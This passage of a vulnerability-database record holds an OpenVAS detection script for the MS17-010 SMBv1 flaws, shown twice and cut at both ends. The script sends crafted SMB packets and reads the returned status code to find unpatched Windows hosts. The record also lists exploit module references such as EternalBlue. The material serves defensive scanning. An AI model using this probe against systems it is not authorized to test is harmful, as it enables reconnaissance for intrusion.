kb_smb_transport();\n\nif(!name || !smbPort){\n exit(0);\n}\n\nsoc = open_sock_tcp( smbPort );\nif( ! 
soc ) exit( 0 );\n\n## SMB Negotiate Protocol Request\nsmb_neg_req = raw_string(0x00, 0x00, 0x00, 0x85, 0xff, 0x53, 0x4d, 0x42,\n 0x72, 0x00, 0x00, 0x00, 0x00, 0x18, 0x03, 0xc8,\n 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\n 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xc5, 0xa6,\n 0x00, 0x00, 0x00, 0x00, 0x00, 0x62, 0x00, 0x02,\n 0x50, 0x43, 0x20, 0x4e, 0x45, 0x54, 0x57, 0x4f,\n 0x52, 0x4b, 0x20, 0x50, 0x52, 0x4f, 0x47, 0x52,\n 0x41, 0x4d, 0x20, 0x31, 0x2e, 0x30, 0x00, 0x02,\n 0x4c, 0x41, 0x4e, 0x4d, 0x41, 0x4e, 0x31, 0x2e,\n 0x30, 0x00, 0x02, 0x57, 0x69, 0x6e, 0x64, 0x6f,\n 0x77, 0x73, 0x20, 0x66, 0x6f, 0x72, 0x20, 0x57,\n 0x6f, 0x72, 0x6b, 0x67, 0x72, 0x6f, 0x75, 0x70,\n 0x73, 0x20, 0x33, 0x2e, 0x31, 0x61, 0x00, 0x02,\n 0x4c, 0x4d, 0x31, 0x2e, 0x32, 0x58, 0x30, 0x30,\n 0x32, 0x00, 0x02, 0x4c, 0x41, 0x4e, 0x4d, 0x41,\n 0x4e, 0x32, 0x2e, 0x31, 0x00, 0x02, 0x4e, 0x54,\n 0x20, 0x4c, 0x4d, 0x20, 0x30, 0x2e, 0x31, 0x32,\n 0x00);\n\nsend( socket:soc, data:smb_neg_req );\n\n## SMB Negotiate Protocol Response\nsmb_neg_resp = smb_recv( socket:soc );\nif( ! 
smb_neg_resp )\n{\n close( soc );\n exit( 0 );\n}\n\n## SMB Session Setup AndX Request, NTLMSSP_NEGOTIATE\nsmb_sess_req = raw_string(0x00, 0x00, 0x00, 0xec, 0xff, 0x53, 0x4d, 0x42,\n 0x73, 0x00, 0x00, 0x00, 0x00, 0x18, 0x03, 0xc8,\n 0x00, 0x00, 0x42, 0x53, 0x52, 0x53, 0x50, 0x59,\n 0x4c, 0x20, 0x00, 0x00, 0x00, 0x00, 0xc5, 0xa6,\n 0x00, 0x00, 0x40, 0x00, 0x0c, 0xff, 0x00, 0x00,\n 0x00, 0x00, 0x44, 0x01, 0x00, 0x01, 0x00, 0x00,\n 0x00, 0x00, 0x00, 0x4a, 0x00, 0x00, 0x00, 0x00,\n 0x00, 0xdc, 0x02, 0x00, 0x80, 0xb1, 0x00, 0x60,\n 0x48, 0x06, 0x06, 0x2b, 0x06, 0x01, 0x05, 0x05,\n 0x02, 0xa0, 0x3e, 0x30, 0x3c, 0xa0, 0x0e, 0x30,\n 0x0c, 0x06, 0x0a, 0x2b, 0x06, 0x01, 0x04, 0x01,\n 0x82, 0x37, 0x02, 0x02, 0x0a, 0xa2, 0x2a, 0x04,\n 0x28, 0x4e, 0x54, 0x4c, 0x4d, 0x53, 0x53, 0x50,\n 0x00, 0x01, 0x00, 0x00, 0x00, 0x05, 0x82, 0x08,\n 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\n 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\n 0x00, 0x05, 0x01, 0x28, 0x0a, 0x00, 0x00, 0x00,\n 0x0f, 0x00, 0x57, 0x00, 0x69, 0x00, 0x6e, 0x00,\n 0x64, 0x00, 0x6f, 0x00, 0x77, 0x00, 0x73, 0x00,\n 0x20, 0x00, 0x32, 0x00, 0x30, 0x00, 0x30, 0x00,\n 0x32, 0x00, 0x20, 0x00, 0x53, 0x00, 0x65, 0x00,\n 0x72, 0x00, 0x76, 0x00, 0x69, 0x00, 0x63, 0x00,\n 0x65, 0x00, 0x20, 0x00, 0x50, 0x00, 0x61, 0x00,\n 0x63, 0x00, 0x6b, 0x00, 0x20, 0x00, 0x32, 0x00,\n 0x20, 0x00, 0x32, 0x00, 0x36, 0x00, 0x30, 0x00,\n 0x30, 0x00, 0x00, 0x00, 0x57, 0x00, 0x69, 0x00,\n 0x6e, 0x00, 0x64, 0x00, 0x6f, 0x00, 0x77, 0x00,\n 0x73, 0x00, 0x20, 0x00, 0x32, 0x00, 0x30, 0x00,\n 0x30, 0x00, 0x32, 0x00, 0x20, 0x00, 0x35, 0x00,\n 0x2e, 0x00, 0x31, 0x00, 0x00, 0x00, 0x00, 0x00);\n\nsend( socket:soc, data:smb_sess_req );\n\n## SMB Session Setup AndX Response, NTLMSSP_CHALLENGE,\n## Error: STATUS_MORE_PROCESSING_REQUIRED\nsmb_sess_resp = smb_recv( socket:soc );\nif( ! 
smb_sess_resp )\n{\n close( soc );\n exit( 0 );\n}\n\n##Extract UID from Session Setup AndX Response\nif(smb_sess_resp && strlen(smb_sess_resp) > 33)\n{\n uid_low = ord(smb_sess_resp[32]);\n uid_high = ord(smb_sess_resp[33]);\n uid = uid_high * 256;\n uid += uid_low;\n}\nelse {\n exit(0);\n}\n\n## SMB Session Setup AndX Request, NTLMSSP_AUTH, User: \\\nsmb_sess_andx_req = raw_string(0x00, 0x00, 0x01, 0x02, 0xff, 0x53, 0x4d, 0x42,\n 0x73, 0x00, 0x00, 0x00, 0x00, 0x18, 0x03, 0xc8,\n 0x00, 0x00, 0x42, 0x53, 0x52, 0x53, 0x50, 0x59,\n 0x4c, 0x20, 0x00, 0x00, 0x00, 0x00, 0xc5, 0xa6)\n + raw_string(uid_low, uid_high) +\n raw_string( 0x80, 0x00, 0x0c, 0xff, 0x00, 0x00,\n 0x00, 0x00, 0x44, 0x01, 0x00, 0x00, 0x00, 0x00,\n 0x00, 0x00, 0x00, 0x61, 0x00, 0x00, 0x00, 0x00,\n 0x00, 0xdc, 0x02, 0x00, 0x80, 0xc7, 0x00, 0xa1,\n 0x5f, 0x30, 0x5d, 0xa2, 0x5b, 0x04, 0x59, 0x4e,\n 0x54, 0x4c, 0x4d, 0x53, 0x53, 0x50, 0x00, 0x03,\n 0x00, 0x00, 0x00, 0x01, 0x00, 0x01, 0x00, 0x48,\n 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x49,\n 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x49,\n 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x49,\n 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x49,\n 0x00, 0x00, 0x00, 0x10, 0x00, 0x10, 0x00, 0x49,\n 0x00, 0x00, 0x00, 0x05, 0x02, 0x08, 0x00, 0x01,\n 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x0f, 0x00,\n 0x77, 0x24, 0xb3, 0x5b, 0xd0, 0xee, 0x67, 0x99,\n 0xa6, 0x5b, 0x68, 0xa4, 0x4f, 0x0e, 0xeb, 0x56,\n 0x57, 0x00, 0x69, 0x00, 0x6e, 0x00, 0x64, 0x00,\n 0x6f, 0x00, 0x77, 0x00, 0x73, 0x00, 0x20, 0x00,\n 0x32, 0x00, 0x30, 0x00, 0x30, 0x00, 0x32, 0x00,\n 0x20, 0x00, 0x53, 0x00, 0x65, 0x00, 0x72, 0x00,\n 0x76, 0x00, 0x69, 0x00, 0x63, 0x00, 0x65, 0x00,\n 0x20, 0x00, 0x50, 0x00, 0x61, 0x00, 0x63, 0x00,\n 0x6b, 0x00, 0x20, 0x00, 0x32, 0x00, 0x20, 0x00,\n 0x32, 0x00, 0x36, 0x00, 0x30, 0x00, 0x30, 0x00,\n 0x00, 0x00, 0x57, 0x00, 0x69, 0x00, 0x6e, 0x00,\n 0x64, 0x00, 0x6f, 0x00, 0x77, 0x00, 0x73, 0x00,\n 0x20, 0x00, 0x32, 0x00, 0x30, 0x00, 0x30, 0x00,\n 0x32, 0x00, 0x20, 0x00, 
0x35, 0x00, 0x2e, 0x00,\n 0x31, 0x00, 0x00, 0x00, 0x00, 0x00);\n\nsend( socket:soc, data:smb_sess_andx_req );\n\n## SMB\tSession Setup AndX Response\nsmb_sess_andx_resp = smb_recv( socket:soc );\nif( ! smb_sess_andx_resp )\n{\n close( soc );\n exit( 0 );\n}\n\n## SMB Tree Connect AndX Request, Path: \\\\xxx.xxx.xxx.xxx\\IPC$\nsmb_tree_resp = smb_tconx( soc:soc, name:name, uid:uid, share:\"IPC$\" );\nif(! smb_tree_resp )\n{\n close( soc );\n exit( 0 );\n}\n\n##Extract Tree ID from SMB Tree Connect Response\nif(smb_tree_resp && strlen(smb_tree_resp) > 29)\n{\n tid_low = ord(smb_tree_resp[28] );\n tid_high = ord(smb_tree_resp[29] );\n}\nelse {\n exit(0);\n}\n\n# SMB Pipe PeekNamedPipe Request, FID: 0x0000\nsmbtrans_request = raw_string(0x00, 0x00, 0x00, 0x4a, 0xff, 0x53, 0x4d, 0x42,\n 0x25, 0x00, 0x00, 0x00, 0x00, 0x18, 0x01, 0x28,\n 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\n 0x00, 0x00, 0x00, 0x00)+raw_string(tid_low, tid_high) +\n raw_string( 0xf5, 0x5e)+raw_string(uid_low, uid_high) +\n raw_string(0x26, 0x76, 0x10, 0x00, 0x00, 0x00,\n 0x00, 0xff, 0xff, 0xff, 0xff, 0x00, 0x00, 0x00,\n 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\n 0x00, 0x4a, 0x00, 0x00, 0x00, 0x4a, 0x00, 0x02,\n 0x00, 0x23, 0x00, 0x00, 0x00, 0x07, 0x00, 0x5c,\n 0x50, 0x49, 0x50, 0x45, 0x5c, 0x00);\n\nsend( socket:soc, data: smbtrans_request);\nsmb_trans_resp = smb_recv( socket:soc );\nif(strlen( smb_trans_resp ) < 39)\n{\n close(soc);\n exit(0);\n}\n\n## SMB Trans Response, Error: STATUS_INSUFF_SERVER_RESOURCES\n## If the status returned is \"STATUS_INSUFF_SERVER_RESOURCES\", the machine\n## does not have the MS17-010 patch. 
After the patch, \"STATUS_ACCESS_DENIED\",\n## \"STATUS_INVALID_HANDLE\".\nif(ord(smb_trans_resp[9]) == 5 && ord(smb_trans_resp[10]) == 2 &&\n ord(smb_trans_resp[11]) == 0 && ord(smb_trans_resp[12]) == 192)\n{\n security_message(port:smbPort );\n close(soc);\n exit(0);\n}\nclose(soc);\n", "naslFamily": "Windows : Microsoft Bulletins"}, "differentElements": ["cvss"], "edition": 6, "lastseen": "2019-05-06T14:30:35"}], "viewCount": 68, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "zdt", "idList": ["1337DAY-ID-33895", "1337DAY-ID-27786", "1337DAY-ID-27752", "1337DAY-ID-33313", "1337DAY-ID-29702", "1337DAY-ID-27613"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:146236", "PACKETSTORM:156196", "PACKETSTORM:154690", "PACKETSTORM:142548", "PACKETSTORM:142181"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE"]}, {"type": "nessus", "idList": ["700059.PRM", "SMB_NT_MS17-010.NASL", "700099.PRM", "MS17-010.NASL"]}, {"type": 
"kaspersky", "idList": ["KLA10977"]}, {"type": "seebug", "idList": ["SSV:92964", "SSV:92952"]}, {"type": "exploitdb", "idList": ["EDB-ID:41891", "EDB-ID:41987", "EDB-ID:47456", "EDB-ID:43970"]}, {"type": "mskb", "idList": ["KB4012598", "KB4013389"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810698", "OPENVAS:1361412562310810810"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "cve", "idList": ["CVE-2017-0145", "CVE-2017-0144", "CVE-2017-0148", "CVE-2017-0143", "CVE-2017-0147", "CVE-2017-0146"]}, {"type": "symantec", "idList": ["SMNTC-96706", "SMNTC-96703", "SMNTC-96705", "SMNTC-96709", "SMNTC-96704", "SMNTC-96707"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2017-0177", "CPAI-2017-0198", "CPAI-2017-0203", "CPAI-2017-0205", "CPAI-2017-0419", "CPAI-2017-0200"]}, {"type": "kitploit", "idList": ["KITPLOIT:9146046356497464176"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37"]}, {"type": "threatpost", "idList": ["THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591"]}, {"type": "mmpc", "idList": ["MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:C211C70545FBDF88C2F99362DC4608A8", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:89789F73D15A0B331512F90F7E692851"]}, {"type": "canvas", "idList": ["MS17_010", "ETERNALBLUE"]}, {"type": "thn", "idList": ["THN:2E043D9BAC04DEE81005124DD54A31E2", "THN:18A54BDD63D7DC2B3284D326E6510150", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:FF56343C15BACA1C1CE83A105EFD7F77"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:CD2337322AF45A03293696D535E4CBF8", 
"QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0148", "MS:CVE-2017-0143", "MS:CVE-2017-0145"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "saint", "idList": ["SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:BD676E3751A4D110EAA275BF92CA7E46"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}], "modified": "2020-06-08T23:26:33", "rev": 2}, "score": {"value": 8.2, "vector": "NONE", "modified": "2020-06-08T23:26:33", "rev": 2}}, "objectVersion": "1.5", "pluginID": "1361412562310810676", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Microsoft Windows SMB Server Multiple Vulnerabilities-Remote (4013389)\n#\n# Authors:\n# Shakeel <bshakeel@secpod.com>\n# Antu Sanadi <santu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.810676\");\n script_version(\"2020-06-04T12:11:49+0000\");\n script_cve_id(\"CVE-2017-0143\", \"CVE-2017-0144\", \"CVE-2017-0145\", \"CVE-2017-0146\",\n \"CVE-2017-0147\", \"CVE-2017-0148\");\n script_bugtraq_id(96703, 96704, 96705, 96707, 96709, 96706);\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-06-04 12:11:49 +0000 (Thu, 04 Jun 2020)\");\n script_tag(name:\"creation_date\", value:\"2017-03-22 17:51:25 +0530 (Wed, 22 Mar 2017)\");\n script_name(\"Microsoft Windows SMB Server Multiple Vulnerabilities-Remote (4013389)\");\n\n script_tag(name:\"summary\", value:\"This host is missing a critical security\n update according to Microsoft Bulletin MS17-010.\");\n\n script_tag(name:\"vuldetect\", value:\"Send the crafted SMB transaction request\n with fid = 0 and check the response to confirm the vulnerability.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exist due to the way that the\n Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow remote\n attackers to gain the ability to execute code on the target server, also\n could lead to information disclosure from the server.\");\n\n script_tag(name:\"affected\", value:\"- Microsoft Windows 10 x32/x64\n\n - Microsoft Windows Server 2012\n\n - Microsoft Windows Server 2016\n\n - Microsoft Windows 8.1 x32/x64\n\n - Microsoft Windows Server 2012 R2\n\n - Microsoft Windows 7 
x32/x64 Service Pack 1\n\n - Microsoft Windows Vista x32/x64 Service Pack 2\n\n - Microsoft Windows Server 2008 R2 x64 Service Pack 1\n\n - Microsoft Windows Server 2008 x32/x64 Service Pack 2\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"remote_active\");\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-in/kb/4013078\");\n script_xref(name:\"URL\", value:\"https://technet.microsoft.com/library/security/MS17-010\");\n script_xref(name:\"URL\", value:\"https://github.com/rapid7/metasploit-framework/pull/8167/files\");\n script_category(ACT_ATTACK);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"gb_smb_version_detect.nasl\", \"os_detection.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"smb_v1/supported\", \"Host/runs_windows\");\n exit(0);\n}\n\ninclude(\"smb_nt.inc\");\ninclude(\"host_details.inc\");\n\nname = kb_smb_name();\nsmbPort = kb_smb_transport();\n\nif(!name || !smbPort){\n exit(0);\n}\n\nsoc = open_sock_tcp( smbPort );\nif( ! 
soc ) exit( 0 );\n\n## SMB Negotiate Protocol Request\nsmb_neg_req = raw_string(0x00, 0x00, 0x00, 0x85, 0xff, 0x53, 0x4d, 0x42,\n 0x72, 0x00, 0x00, 0x00, 0x00, 0x18, 0x03, 0xc8,\n 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\n 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xc5, 0xa6,\n 0x00, 0x00, 0x00, 0x00, 0x00, 0x62, 0x00, 0x02,\n 0x50, 0x43, 0x20, 0x4e, 0x45, 0x54, 0x57, 0x4f,\n 0x52, 0x4b, 0x20, 0x50, 0x52, 0x4f, 0x47, 0x52,\n 0x41, 0x4d, 0x20, 0x31, 0x2e, 0x30, 0x00, 0x02,\n 0x4c, 0x41, 0x4e, 0x4d, 0x41, 0x4e, 0x31, 0x2e,\n 0x30, 0x00, 0x02, 0x57, 0x69, 0x6e, 0x64, 0x6f,\n 0x77, 0x73, 0x20, 0x66, 0x6f, 0x72, 0x20, 0x57,\n 0x6f, 0x72, 0x6b, 0x67, 0x72, 0x6f, 0x75, 0x70,\n 0x73, 0x20, 0x33, 0x2e, 0x31, 0x61, 0x00, 0x02,\n 0x4c, 0x4d, 0x31, 0x2e, 0x32, 0x58, 0x30, 0x30,\n 0x32, 0x00, 0x02, 0x4c, 0x41, 0x4e, 0x4d, 0x41,\n 0x4e, 0x32, 0x2e, 0x31, 0x00, 0x02, 0x4e, 0x54,\n 0x20, 0x4c, 0x4d, 0x20, 0x30, 0x2e, 0x31, 0x32,\n 0x00);\n\nsend( socket:soc, data:smb_neg_req );\n\n## SMB Negotiate Protocol Response\nsmb_neg_resp = smb_recv( socket:soc );\nif( ! 
smb_neg_resp )\n{\n close( soc );\n exit( 0 );\n}\n\n## SMB Session Setup AndX Request, NTLMSSP_NEGOTIATE\nsmb_sess_req = raw_string(0x00, 0x00, 0x00, 0xec, 0xff, 0x53, 0x4d, 0x42,\n 0x73, 0x00, 0x00, 0x00, 0x00, 0x18, 0x03, 0xc8,\n 0x00, 0x00, 0x42, 0x53, 0x52, 0x53, 0x50, 0x59,\n 0x4c, 0x20, 0x00, 0x00, 0x00, 0x00, 0xc5, 0xa6,\n 0x00, 0x00, 0x40, 0x00, 0x0c, 0xff, 0x00, 0x00,\n 0x00, 0x00, 0x44, 0x01, 0x00, 0x01, 0x00, 0x00,\n 0x00, 0x00, 0x00, 0x4a, 0x00, 0x00, 0x00, 0x00,\n 0x00, 0xdc, 0x02, 0x00, 0x80, 0xb1, 0x00, 0x60,\n 0x48, 0x06, 0x06, 0x2b, 0x06, 0x01, 0x05, 0x05,\n 0x02, 0xa0, 0x3e, 0x30, 0x3c, 0xa0, 0x0e, 0x30,\n 0x0c, 0x06, 0x0a, 0x2b, 0x06, 0x01, 0x04, 0x01,\n 0x82, 0x37, 0x02, 0x02, 0x0a, 0xa2, 0x2a, 0x04,\n 0x28, 0x4e, 0x54, 0x4c, 0x4d, 0x53, 0x53, 0x50,\n 0x00, 0x01, 0x00, 0x00, 0x00, 0x05, 0x82, 0x08,\n 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\n 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\n 0x00, 0x05, 0x01, 0x28, 0x0a, 0x00, 0x00, 0x00,\n 0x0f, 0x00, 0x57, 0x00, 0x69, 0x00, 0x6e, 0x00,\n 0x64, 0x00, 0x6f, 0x00, 0x77, 0x00, 0x73, 0x00,\n 0x20, 0x00, 0x32, 0x00, 0x30, 0x00, 0x30, 0x00,\n 0x32, 0x00, 0x20, 0x00, 0x53, 0x00, 0x65, 0x00,\n 0x72, 0x00, 0x76, 0x00, 0x69, 0x00, 0x63, 0x00,\n 0x65, 0x00, 0x20, 0x00, 0x50, 0x00, 0x61, 0x00,\n 0x63, 0x00, 0x6b, 0x00, 0x20, 0x00, 0x32, 0x00,\n 0x20, 0x00, 0x32, 0x00, 0x36, 0x00, 0x30, 0x00,\n 0x30, 0x00, 0x00, 0x00, 0x57, 0x00, 0x69, 0x00,\n 0x6e, 0x00, 0x64, 0x00, 0x6f, 0x00, 0x77, 0x00,\n 0x73, 0x00, 0x20, 0x00, 0x32, 0x00, 0x30, 0x00,\n 0x30, 0x00, 0x32, 0x00, 0x20, 0x00, 0x35, 0x00,\n 0x2e, 0x00, 0x31, 0x00, 0x00, 0x00, 0x00, 0x00);\n\nsend( socket:soc, data:smb_sess_req );\n\n## SMB Session Setup AndX Response, NTLMSSP_CHALLENGE,\n## Error: STATUS_MORE_PROCESSING_REQUIRED\nsmb_sess_resp = smb_recv( socket:soc );\nif( ! 
smb_sess_resp )\n{\n close( soc );\n exit( 0 );\n}\n\n##Extract UID from Session Setup AndX Response\nif(smb_sess_resp && strlen(smb_sess_resp) > 33)\n{\n uid_low = ord(smb_sess_resp[32]);\n uid_high = ord(smb_sess_resp[33]);\n uid = uid_high * 256;\n uid += uid_low;\n}\nelse {\n exit(0);\n}\n\n## SMB Session Setup AndX Request, NTLMSSP_AUTH, User: \\\nsmb_sess_andx_req = raw_string(0x00, 0x00, 0x01, 0x02, 0xff, 0x53, 0x4d, 0x42,\n 0x73, 0x00, 0x00, 0x00, 0x00, 0x18, 0x03, 0xc8,\n 0x00, 0x00, 0x42, 0x53, 0x52, 0x53, 0x50, 0x59,\n 0x4c, 0x20, 0x00, 0x00, 0x00, 0x00, 0xc5, 0xa6)\n + raw_string(uid_low, uid_high) +\n raw_string( 0x80, 0x00, 0x0c, 0xff, 0x00, 0x00,\n 0x00, 0x00, 0x44, 0x01, 0x00, 0x00, 0x00, 0x00,\n 0x00, 0x00, 0x00, 0x61, 0x00, 0x00, 0x00, 0x00,\n 0x00, 0xdc, 0x02, 0x00, 0x80, 0xc7, 0x00, 0xa1,\n 0x5f, 0x30, 0x5d, 0xa2, 0x5b, 0x04, 0x59, 0x4e,\n 0x54, 0x4c, 0x4d, 0x53, 0x53, 0x50, 0x00, 0x03,\n 0x00, 0x00, 0x00, 0x01, 0x00, 0x01, 0x00, 0x48,\n 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x49,\n 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x49,\n 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x49,\n 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x49,\n 0x00, 0x00, 0x00, 0x10, 0x00, 0x10, 0x00, 0x49,\n 0x00, 0x00, 0x00, 0x05, 0x02, 0x08, 0x00, 0x01,\n 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x0f, 0x00,\n 0x77, 0x24, 0xb3, 0x5b, 0xd0, 0xee, 0x67, 0x99,\n 0xa6, 0x5b, 0x68, 0xa4, 0x4f, 0x0e, 0xeb, 0x56,\n 0x57, 0x00, 0x69, 0x00, 0x6e, 0x00, 0x64, 0x00,\n 0x6f, 0x00, 0x77, 0x00, 0x73, 0x00, 0x20, 0x00,\n 0x32, 0x00, 0x30, 0x00, 0x30, 0x00, 0x32, 0x00,\n 0x20, 0x00, 0x53, 0x00, 0x65, 0x00, 0x72, 0x00,\n 0x76, 0x00, 0x69, 0x00, 0x63, 0x00, 0x65, 0x00,\n 0x20, 0x00, 0x50, 0x00, 0x61, 0x00, 0x63, 0x00,\n 0x6b, 0x00, 0x20, 0x00, 0x32, 0x00, 0x20, 0x00,\n 0x32, 0x00, 0x36, 0x00, 0x30, 0x00, 0x30, 0x00,\n 0x00, 0x00, 0x57, 0x00, 0x69, 0x00, 0x6e, 0x00,\n 0x64, 0x00, 0x6f, 0x00, 0x77, 0x00, 0x73, 0x00,\n 0x20, 0x00, 0x32, 0x00, 0x30, 0x00, 0x30, 0x00,\n 0x32, 0x00, 0x20, 0x00, 
0x35, 0x00, 0x2e, 0x00,\n 0x31, 0x00, 0x00, 0x00, 0x00, 0x00);\n\nsend( socket:soc, data:smb_sess_andx_req );\n\n## SMB Session Setup AndX Response\nsmb_sess_andx_resp = smb_recv( socket:soc );\nif( ! smb_sess_andx_resp )\n{\n close( soc );\n exit( 0 );\n}\n\n## SMB Tree Connect AndX Request, Path: \\\\xxx.xxx.xxx.xxx\\IPC$\nsmb_tree_resp = smb_tconx( soc:soc, name:name, uid:uid, share:\"IPC$\" );\nif(! smb_tree_resp )\n{\n close( soc );\n exit( 0 );\n}\n\n##Extract Tree ID from SMB Tree Connect Response\nif(smb_tree_resp && strlen(smb_tree_resp) > 29)\n{\n tid_low = ord(smb_tree_resp[28] );\n tid_high = ord(smb_tree_resp[29] );\n}\nelse {\n exit(0);\n}\n\n# SMB Pipe PeekNamedPipe Request, FID: 0x0000\nsmbtrans_request = raw_string(0x00, 0x00, 0x00, 0x4a, 0xff, 0x53, 0x4d, 0x42,\n 0x25, 0x00, 0x00, 0x00, 0x00, 0x18, 0x01, 0x28,\n 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\n 0x00, 0x00, 0x00, 0x00)+raw_string(tid_low, tid_high) +\n raw_string( 0xf5, 0x5e)+raw_string(uid_low, uid_high) +\n raw_string(0x26, 0x76, 0x10, 0x00, 0x00, 0x00,\n 0x00, 0xff, 0xff, 0xff, 0xff, 0x00, 0x00, 0x00,\n 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\n 0x00, 0x4a, 0x00, 0x00, 0x00, 0x4a, 0x00, 0x02,\n 0x00, 0x23, 0x00, 0x00, 0x00, 0x07, 0x00, 0x5c,\n 0x50, 0x49, 0x50, 0x45, 0x5c, 0x00);\n\nsend( socket:soc, data: smbtrans_request);\nsmb_trans_resp = smb_recv( socket:soc );\nif(strlen( smb_trans_resp ) < 39)\n{\n close(soc);\n exit(0);\n}\n\n## SMB Trans Response, 